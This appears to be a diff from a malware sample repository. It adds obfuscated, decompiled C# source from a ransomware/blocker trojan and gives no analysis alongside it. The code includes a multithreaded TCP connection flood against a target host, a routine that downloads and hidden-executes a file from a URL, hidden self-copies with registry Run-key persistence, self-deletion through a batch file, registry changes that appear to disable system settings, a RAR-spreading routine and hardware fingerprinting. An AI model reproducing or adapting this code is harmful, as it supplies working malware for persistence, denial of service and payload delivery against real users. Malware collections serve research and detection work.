count = ((int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45] & -129) << 8 | (int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45 + 1];
cb118298f356e23d856766cd5c0861a45 += 2;
}
else
{
count = ((int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45] & -193) << 24 | (int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45 + 1] << 16 | (int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45 + 2] << 8 | (int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45 + 3];
cb118298f356e23d856766cd5c0861a45 += 4;
}
return count < 1 ? string.Empty : string.Intern(Encoding.Unicode.GetString(c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef, cb118298f356e23d856766cd5c0861a45, count));
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c2b32128b27710d76674c1117f7f19ccf.cs
+125
View File
@@ -0,0 +1,125 @@
// Decompiled with JetBrains decompiler
// Type: A.c2b32128b27710d76674c1117f7f19ccf
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.Net;
using System.Net.Sockets;
using System.Threading;
namespace A
{
internal class c2b32128b27710d76674c1117f7f19ccf
{
private static ThreadStart[] c1aa5e7f9240b5cc21ac78813ddfbaa39;
private static Thread[] c12e108ff6c83dbee08305cc2b0ce9998;
public static string c966ab90271ad8729ab4aa4181c310abf;
private static IPEndPoint cdd98f4a39e676344f91b06e9be54701b;
public static ushort cf7dbbb0d9526e45865da4ee3fb9e1488;
private static c2b32128b27710d76674c1117f7f19ccf.c4266534a0e42882f2383a9b38c981148[] c0b642d31ab826f70f3bf7cc60c70e048;
public static int c52cb3c9fa9ea96db544af1bec7b932c8;
public static int c1e5fb6eadf8fa36fbb78b515080241e1;
public static void c68372a86611194582de7bf4f45c72f47()
{
try
{
c2b32128b27710d76674c1117f7f19ccf.cdd98f4a39e676344f91b06e9be54701b = new IPEndPoint(Dns.GetHostEntry(c2b32128b27710d76674c1117f7f19ccf.c966ab90271ad8729ab4aa4181c310abf).AddressList[0], (int) c2b32128b27710d76674c1117f7f19ccf.cf7dbbb0d9526e45865da4ee3fb9e1488);
}
catch
{
c2b32128b27710d76674c1117f7f19ccf.cdd98f4a39e676344f91b06e9be54701b = new IPEndPoint(IPAddress.Parse(c2b32128b27710d76674c1117f7f19ccf.c966ab90271ad8729ab4aa4181c310abf), (int) c2b32128b27710d76674c1117f7f19ccf.cf7dbbb0d9526e45865da4ee3fb9e1488);
}
c2b32128b27710d76674c1117f7f19ccf.c12e108ff6c83dbee08305cc2b0ce9998 = new Thread[c2b32128b27710d76674c1117f7f19ccf.c1e5fb6eadf8fa36fbb78b515080241e1];
c2b32128b27710d76674c1117f7f19ccf.c1aa5e7f9240b5cc21ac78813ddfbaa39 = new ThreadStart[c2b32128b27710d76674c1117f7f19ccf.c1e5fb6eadf8fa36fbb78b515080241e1];
c2b32128b27710d76674c1117f7f19ccf.c0b642d31ab826f70f3bf7cc60c70e048 = new c2b32128b27710d76674c1117f7f19ccf.c4266534a0e42882f2383a9b38c981148[c2b32128b27710d76674c1117f7f19ccf.c1e5fb6eadf8fa36fbb78b515080241e1];
for (int index = 0; index < c2b32128b27710d76674c1117f7f19ccf.c1e5fb6eadf8fa36fbb78b515080241e1; ++index)
{
c2b32128b27710d76674c1117f7f19ccf.c0b642d31ab826f70f3bf7cc60c70e048[index] = new c2b32128b27710d76674c1117f7f19ccf.c4266534a0e42882f2383a9b38c981148(c2b32128b27710d76674c1117f7f19ccf.cdd98f4a39e676344f91b06e9be54701b, c2b32128b27710d76674c1117f7f19ccf.c52cb3c9fa9ea96db544af1bec7b932c8);
c2b32128b27710d76674c1117f7f19ccf.c1aa5e7f9240b5cc21ac78813ddfbaa39[index] = new ThreadStart(c2b32128b27710d76674c1117f7f19ccf.c0b642d31ab826f70f3bf7cc60c70e048[index].c254d67f0f5a5ab80dbe5de1d1b27a54e);
c2b32128b27710d76674c1117f7f19ccf.c12e108ff6c83dbee08305cc2b0ce9998[index] = new Thread(c2b32128b27710d76674c1117f7f19ccf.c1aa5e7f9240b5cc21ac78813ddfbaa39[index]);
c2b32128b27710d76674c1117f7f19ccf.c12e108ff6c83dbee08305cc2b0ce9998[index].Start();
}
}
public static void c90f6d098ad5ce70814005fb0adf72870()
{
for (int index = 0; index < c2b32128b27710d76674c1117f7f19ccf.c1e5fb6eadf8fa36fbb78b515080241e1; ++index)
{
try
{
c2b32128b27710d76674c1117f7f19ccf.c12e108ff6c83dbee08305cc2b0ce9998[index].Suspend();
}
catch
{
}
}
}
private class c4266534a0e42882f2383a9b38c981148
{
private IPEndPoint cdd98f4a39e676344f91b06e9be54701b;
private Socket[] cd5ac2690507af44059caeb0c8b2a71f7;
private int c52cb3c9fa9ea96db544af1bec7b932c8;
public c4266534a0e42882f2383a9b38c981148(
IPEndPoint c8293ed1972789902aa5c44e762d830c9,
int c6119b42523906b6f13307cecbf8b1413)
{
this.cdd98f4a39e676344f91b06e9be54701b = c8293ed1972789902aa5c44e762d830c9;
this.c52cb3c9fa9ea96db544af1bec7b932c8 = c6119b42523906b6f13307cecbf8b1413;
}
private void c22ceca82e2535e14a0cc7fd164eea8bb(IAsyncResult c3174ece3cd2dcd4435a3a66491c498e6)
{
}
public void c254d67f0f5a5ab80dbe5de1d1b27a54e()
{
label_1:
try
{
while (true)
{
this.cd5ac2690507af44059caeb0c8b2a71f7 = new Socket[this.c52cb3c9fa9ea96db544af1bec7b932c8];
for (int index = 0; index < this.c52cb3c9fa9ea96db544af1bec7b932c8; ++index)
{
this.cd5ac2690507af44059caeb0c8b2a71f7[index] = new Socket(this.cdd98f4a39e676344f91b06e9be54701b.AddressFamily, SocketType.Stream, ProtocolType.Tcp);
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Blocking = false;
AsyncCallback callback = new AsyncCallback(this.c22ceca82e2535e14a0cc7fd164eea8bb);
this.cd5ac2690507af44059caeb0c8b2a71f7[index].BeginConnect((EndPoint) this.cdd98f4a39e676344f91b06e9be54701b, callback, (object) this.cd5ac2690507af44059caeb0c8b2a71f7[index]);
}
Thread.Sleep(100);
for (int index = 0; index < this.c52cb3c9fa9ea96db544af1bec7b932c8; ++index)
{
if (this.cd5ac2690507af44059caeb0c8b2a71f7[index].Connected)
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Disconnect(false);
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Close();
this.cd5ac2690507af44059caeb0c8b2a71f7[index] = (Socket) null;
}
this.cd5ac2690507af44059caeb0c8b2a71f7 = (Socket[]) null;
}
}
catch
{
for (int index = 0; index < this.c52cb3c9fa9ea96db544af1bec7b932c8; ++index)
{
try
{
if (this.cd5ac2690507af44059caeb0c8b2a71f7[index].Connected)
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Disconnect(false);
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Close();
this.cd5ac2690507af44059caeb0c8b2a71f7[index] = (Socket) null;
}
catch
{
}
}
goto label_1;
}
}
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c3037471a929a2c4f79d69973718345fa.cs
+70
View File
@@ -0,0 +1,70 @@
// Decompiled with JetBrains decompiler
// Type: A.c3037471a929a2c4f79d69973718345fa
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using Microsoft.Win32;
using System;
using System.Management;
namespace A
{
internal class c3037471a929a2c4f79d69973718345fa
{
public string c738d27e0c9d7bf012cc5f99d4e1976d7() => this.cb6dcfcc6a5b19bdf121f6143ff6d7f33() + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(387) + this.ca7e5f7d544fbc3dcaf17e61fbab6e3dd();
public string c72aa46ec5ece51f7696deeb664e545ce()
{
string c45a1644c18560d9d988c8c135941ea96 = (this.c8399c5c4fcb71c18f3f458b674bb41c5() + this.ca6a4dd6f6e974a349cf2f38f0541f742() + this.c006e22094a7a882c42eb57a97d75a841()).ToString();
return c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c31239248ceba059cc32e70ac96898ec2(c45a1644c18560d9d988c8c135941ea96);
}
private string cb6dcfcc6a5b19bdf121f6143ff6d7f33()
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(782), c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(803));
string empty = string.Empty;
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
empty = Convert.ToString(managementBaseObject[c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(876)]);
try
{
string str = empty.Split('|')[0];
int length = str.Split(' ')[0].Length;
return str.Substring(length).TrimStart().TrimEnd();
}
catch
{
return c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(885);
}
}
private string ca7e5f7d544fbc3dcaf17e61fbab6e3dd() => Registry.LocalMachine.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(914)).GetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1007)).ToString().Contains(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1028)) ? c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1035) : c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1052);
private string c8399c5c4fcb71c18f3f458b674bb41c5()
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(782), c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1069));
string empty = string.Empty;
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
empty = Convert.ToString(managementBaseObject[c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1176)]);
return empty;
}
private string c006e22094a7a882c42eb57a97d75a841()
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(782), c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1199));
string empty = string.Empty;
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
empty = Convert.ToString(managementBaseObject[c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1258)]);
return empty;
}
public string ca6a4dd6f6e974a349cf2f38f0541f742()
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(782), c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1283));
string empty = string.Empty;
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
empty = Convert.ToString(managementBaseObject[c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1354)]);
return empty;
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c3f3e07dcb3874c5b417537b713b608b7.cs
+196
View File
@@ -0,0 +1,196 @@
// Decompiled with JetBrains decompiler
// Type: A.c3f3e07dcb3874c5b417537b713b608b7
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Threading;
namespace A
{
internal class c3f3e07dcb3874c5b417537b713b608b7
{
private Mutex c96cf8adc07121b9089c8779f8a06475a;
public void c366d1ab19bbdf3ebcee35b30020550b1()
{
this.cc286121f05a5cd6b2f553091501ad86b();
this.c44a8775ef705aea893c2464d5dc35368();
this.c3a314ec321315e78451e3a3160d4e530();
}
private void cc286121f05a5cd6b2f553091501ad86b()
{
try
{
this.c96cf8adc07121b9089c8779f8a06475a = new Mutex(true, c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c053a2ccab85d88a8bb0dd1fb41fedf35);
this.c96cf8adc07121b9089c8779f8a06475a.ReleaseMutex();
}
catch
{
Environment.Exit(-1);
}
}
private void c3a314ec321315e78451e3a3160d4e530()
{
string fileName = Process.GetCurrentProcess().MainModule.FileName;
if (this.c26b99a61e58734baa67d710bbfd72df9())
return;
try
{
foreach (string str in c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e)
{
if (!c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8f544c7c514248e2027acc2eed25b743(str))
System.IO.File.Copy(fileName, str);
System.IO.File.SetAttributes(str, FileAttributes.Hidden);
}
}
catch
{
}
try
{
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).SetValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[0], (object) ('"'.ToString() + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e[0] + (object) '"'));
Registry.LocalMachine.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).SetValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[1], (object) ('"'.ToString() + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e[1] + (object) '"'));
}
catch
{
}
try
{
this.c96cf8adc07121b9089c8779f8a06475a.Close();
foreach (string str in c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e)
new Process()
{
StartInfo = {
FileName = str,
WindowStyle = ProcessWindowStyle.Hidden
}
}.Start();
}
catch
{
}
Environment.Exit(-1);
}
public void c32ad199a1a1b21b2f3794ba8b7927c6b(string cf6d6107114ce95c52d91a8d33c162461)
{
try
{
this.c96cf8adc07121b9089c8779f8a06475a.Close();
}
catch
{
}
try
{
string str = c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c4028bc68211f16a03921654b4b8b346f(new Random().Next(5, 12)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1680);
new WebClient().DownloadFile(cf6d6107114ce95c52d91a8d33c162461, Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str);
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str),
WindowStyle = ProcessWindowStyle.Hidden
}
}.Start();
}
catch
{
}
this.c514ba733b87988f147798195875c1771();
Environment.Exit(-1);
}
public void ceaf8f38b42d6fe6312cc350ddb4ba0d6()
{
try
{
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).DeleteValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[0]);
Registry.LocalMachine.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).DeleteValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[1]);
}
catch
{
}
try
{
foreach (string path in c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e)
System.IO.File.Delete(path);
}
catch
{
}
this.c514ba733b87988f147798195875c1771();
Environment.Exit(-1);
}
private bool c26b99a61e58734baa67d710bbfd72df9()
{
string[] c712648a24a265f1e1bc00c1dfbecbd3e = c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e;
int index = 0;
if (index < c712648a24a265f1e1bc00c1dfbecbd3e.Length)
{
string c8ce60bab4df112e38d93bdc39407e331 = c712648a24a265f1e1bc00c1dfbecbd3e[index];
if (!c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8f544c7c514248e2027acc2eed25b743(c8ce60bab4df112e38d93bdc39407e331))
return false;
}
return true;
}
private void c514ba733b87988f147798195875c1771()
{
try
{
string str = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1796) + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1813) + (object) '"' + Path.GetFileName(Process.GetCurrentProcess().MainModule.FileName) + (object) '"' + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1834);
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1851));
textWriter.WriteLine(str);
textWriter.Close();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1851)),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
private void c44a8775ef705aea893c2464d5dc35368()
{
try
{
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1874), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1993), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2006), RegistryValueKind.DWord);
}
catch
{
}
if (!c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ca20a8f4602f269ed2947b3a5ca5860a2)
return;
try
{
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1874), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2009), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2044), RegistryValueKind.DWord);
}
catch
{
}
try
{
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2047), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2162), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2044), RegistryValueKind.DWord);
Registry.LocalMachine.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2047), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2162), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2044), RegistryValueKind.DWord);
}
catch
{
}
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c57ac7140997a29abffbea04a04f33fc6.cs
+47
View File
@@ -0,0 +1,47 @@
// Decompiled with JetBrains decompiler
// Type: A.c57ac7140997a29abffbea04a04f33fc6
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using Stub;
using System;
using System.Threading;
namespace A
{
internal class c57ac7140997a29abffbea04a04f33fc6
{
public static c9988649815b3bee89b89ce1f70add59a c5a948dc66b99c61ab7c2f0ddb4575bab = new c9988649815b3bee89b89ce1f70add59a();
public static cee7cc3756d4f6d8913411c92b2e1cc36 c4a101047227d6769ba130216f202ea07 = new cee7cc3756d4f6d8913411c92b2e1cc36();
public static c3037471a929a2c4f79d69973718345fa c906da2a7a2d79845c79ec2f4265c6c3c = new c3037471a929a2c4f79d69973718345fa();
public static c3f3e07dcb3874c5b417537b713b608b7 cb5ecebe7cbd234304d7228da096a3fa0 = new c3f3e07dcb3874c5b417537b713b608b7();
private static c6c454dac7269c067c2acbc6d3596af91 c1f59c75a7758cd88db10cb053ec12484 = new c6c454dac7269c067c2acbc6d3596af91();
private static c9b81b1a3e4ee51d08f5de2448e459036 cd3beb5c7063d57804364840e4ac23c4c = new c9b81b1a3e4ee51d08f5de2448e459036();
public static void c56feb5559c9c148fe3f0ec4770d94bc0(string[] c01306e5de7acf5afd10f9b0df1fe65dd)
{
c6483995e04301d945fdc8bbbeb2fdfcb.cface76737f299c15f46aea51d2f361b6();
if (!c57ac7140997a29abffbea04a04f33fc6.c1f59c75a7758cd88db10cb053ec12484.cf207f3ae43b7e20165972765acd61caf())
Environment.Exit(-1);
c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c5c0d142f43b2ed4000991109cbc0575f = c57ac7140997a29abffbea04a04f33fc6.c906da2a7a2d79845c79ec2f4265c6c3c.c72aa46ec5ece51f7696deeb664e545ce();
c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c8d4d9680af49d6d5dcc86b05695287f2 = c57ac7140997a29abffbea04a04f33fc6.c906da2a7a2d79845c79ec2f4265c6c3c.c738d27e0c9d7bf012cc5f99d4e1976d7();
c57ac7140997a29abffbea04a04f33fc6.cb5ecebe7cbd234304d7228da096a3fa0.c366d1ab19bbdf3ebcee35b30020550b1();
c57ac7140997a29abffbea04a04f33fc6.cd3beb5c7063d57804364840e4ac23c4c.ccca4f7e07f327977d582f4cecb7af4cd();
c57ac7140997a29abffbea04a04f33fc6.cd8bddfe2d687609fcccf8a112b76812e();
}
private static void cd8bddfe2d687609fcccf8a112b76812e()
{
if (!c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c3bb3892b091698f44f5eef2d60b4fdce)
return;
try
{
new Thread(new ThreadStart(cRARSpread.RARSpread)).Start();
}
catch
{
}
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c6483995e04301d945fdc8bbbeb2fdfcb.cs
+214
View File
@@ -0,0 +1,214 @@
// Decompiled with JetBrains decompiler
// Type: A.c6483995e04301d945fdc8bbbeb2fdfcb
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
namespace A
{
internal class c6483995e04301d945fdc8bbbeb2fdfcb
{
internal const uint c815d7d663eef3c44b2caa9f3d6111388 = 1024;
internal const uint ce1a64a0ce40f52be8d5cd5f2ab8d4bec = 64;
internal const int c9e8de4583ee928c4800269558d166b7e = 0;
private static bool c75ea3b951856ad38b52cbf8b6402d522;
[DllImport("kernel32.dll", EntryPoint = "SetLastError")]
internal static extern void c391cc9da68ba80667b423713f74af35b(
uint c3c2d28d090853af7ce1e2c9436d4e6b3);
[DllImport("kernel32.dll", EntryPoint = "CloseHandle")]
internal static extern int cace4d6faccfae54b4cce02f5ff6a9d78(
IntPtr c1511c2036aa4b7ba89764385ca9dba92);
[DllImport("kernel32.dll", EntryPoint = "OpenProcess")]
internal static extern IntPtr ccfa0dd8bc046c30e43dcac27b0790853(
uint c104f3bd454450b5fae258ea4698c08fa,
int c7e99aabe62df3fabf80d42cf90e0e3f0,
uint c56f77053e15999af6844efc9bdde822d);
[DllImport("kernel32.dll", EntryPoint = "GetCurrentProcessId")]
internal static extern uint c30c15026493b976c2325f72361ac915c();
[DllImport("kernel32.dll", EntryPoint = "LoadLibrary", CharSet = CharSet.Auto, SetLastError = true)]
internal static extern IntPtr c70f94891cb4225163b481930fa82b941(
string c17f152cc83728b20f2e2e392435ccca5);
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c808000474b78cc57ff5e0ac36b3fcc73 cb3b55426f89535f91bb419e6996e2646(
IntPtr c6b70c3224512397ad0c3a2798d87e490,
string c85d99f904a6bb91d7c1a6a0954317af3);
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.cc055647fecedcfcae1eaf4bbad26d609 c6dbc9e316fddad0a9f7623fb3be9ceff(
IntPtr c6b70c3224512397ad0c3a2798d87e490,
string c85d99f904a6bb91d7c1a6a0954317af3);
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.cb52fb1903297a0d67737ce529c917679 cdf87155547dda952c916d9b76727151f(
IntPtr c6b70c3224512397ad0c3a2798d87e490,
string c85d99f904a6bb91d7c1a6a0954317af3);
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c9d3e290b2a38dccd6dec3b8cbf70f0c7 c4d8130fdf16941c5a049e8c5637a73b3(
IntPtr c6b70c3224512397ad0c3a2798d87e490,
string c85d99f904a6bb91d7c1a6a0954317af3);
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c8b9df66c099e027db7fe27eeb5d97544 c823a12567a85c9243ae40e47539c1cbb(
IntPtr c6b70c3224512397ad0c3a2798d87e490,
string c85d99f904a6bb91d7c1a6a0954317af3);
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c92e35801b4eaae7ab7d70e17c0173e9c c7dda1f225a33dfcf98fae6f7e3f67461(
IntPtr c6b70c3224512397ad0c3a2798d87e490,
string c85d99f904a6bb91d7c1a6a0954317af3);
private static int c084af11cdc465888c3ed538fb3591a27(
IntPtr c157a4097f532e5292cc2957be55db66e,
IntPtr c3ac7a813ea74272766c650f10278c114)
{
string[] strArray = new string[1]
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2181)
};
string strA = c6483995e04301d945fdc8bbbeb2fdfcb.c8859338e5a3695a878c4bf6705d5751e(c157a4097f532e5292cc2957be55db66e);
foreach (string strB in strArray)
{
if (string.Compare(strA, strB, true) == 0)
{
c6483995e04301d945fdc8bbbeb2fdfcb.c75ea3b951856ad38b52cbf8b6402d522 = true;
return 0;
}
}
return 1;
}
[DllImport("user32.dll", EntryPoint = "GetClassName", CharSet = CharSet.Auto)]
